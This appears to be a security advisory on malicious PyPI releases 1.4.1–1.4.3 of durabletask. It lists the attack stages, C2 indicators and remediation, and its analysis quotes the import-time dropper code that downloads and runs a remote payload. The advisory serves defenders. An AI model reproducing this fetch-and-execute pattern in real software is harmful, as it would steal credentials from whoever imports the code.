1.4.1, 1.4.2, and 1.4.3 of durabletask were compromised via a PyPI maintainer account takeover. All three malicious versions were published on 2026-05-19 within a 35-minute window (16:19–16:54 UTC). Pin to <=1.4.0.

Attack chain

• Stage 1 — Import-time dropper: on import, the package fetches a second-stage payload rope.pyz from check.git-service.com (160.119.64.3). The TLS certificate for this C2 was issued on 2026-05-16, indicating ~3 days of pre-attack staging.
• Stage 2 — Credential-theft framework:
  • AWS / Azure / GCP IMDS interrogation and Secrets Manager dumps
  • Kubernetes lateral movement via in-cluster service-account tokens
  • HashiCorp Vault token extraction
  • Harvesting from 85 known filesystem credential paths
  • Brute-forcing of local password manager vaults
• Exfiltration: stolen data is encrypted and shipped to the primary C2, with a dead-drop fallback that pushes encrypted blobs as GitHub commits (FIRESCALE-style egress).
• Persistence: systemd unit pgsql-monitor.service.
• Destructive payload: a geotargeted wiper activates on hosts identified as being located in Israel or Iran.

Indicators of compromise

• C2 (primary): check.git-service.com — 160.119.64.3
• C2 (secondary): t.m-kosche.com — 185.95.159.32
• Dropped payload: rope.pyz
• Persistence unit: pgsql-monitor.service

Recommended actions

• Pin durabletask to <=1.4.0.
• Block both C2 domains at network egress.
• Treat any Linux system that imported 1.4.1 / 1.4.2 / 1.4.3 as fully compromised — rotate all reachable secrets and rebuild affected hosts.

---

-= Per source details. Do not edit below this line.=-

On every import durabletask, the package's top-level __init__.py (lines 8-11) calls urllib.request.urlretrieve('https://check.git-service.com/rope.pyz', '/tmp/managed.pyz') and then subprocess.Popen(['python3', '/tmp/managed.pyz'], start_new_session=True) on Linux. The fetched zipapp is executed with no hash or signature verification, in a detached session. The destination check.git-service.com is a generic-git-service lookalike domain unrelated to the legitimate publisher of durabletask (Microsoft / microsoft/durabletask-python on github.com). The trigger is module import — not pip install — so install-phase sandboxes (pip download, pip wheel, build isolation) never observe the network activity; the dropper fires when the package is loaded in CI, production, or a developer's interpreter. The pattern (plaintext additive trailing block in __init__.py, Linux platform gate, .pyz staged to /tmp/ and handed to python3, lookalike git-<project>.com-style C2) matches a known import-time dropper campaign and is structurally indistinguishable from a stolen-publish-credential compromise of a legitimate package.

Versions 1.4.1, 1.4.2, 1.4.3 were compromised.

During import of compromised versions, the malicious code is downloaded and executed. It exfiltrates all kinds of credentials and sensitive files, including data from secret and password managers, SSH keys, configuration files. Code tries to achieve a persistence via systemd unit.

---

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-05-compr-durabletask

Reasons (based on the campaign):

• files-exfiltration

• exfiltration-env-variables

• exfiltration-ssh-keys

• exfiltration-cloud-tokens

• Downloads and executes a remote malicious script.

• exfiltration-credentials

• persistence

• compromised-package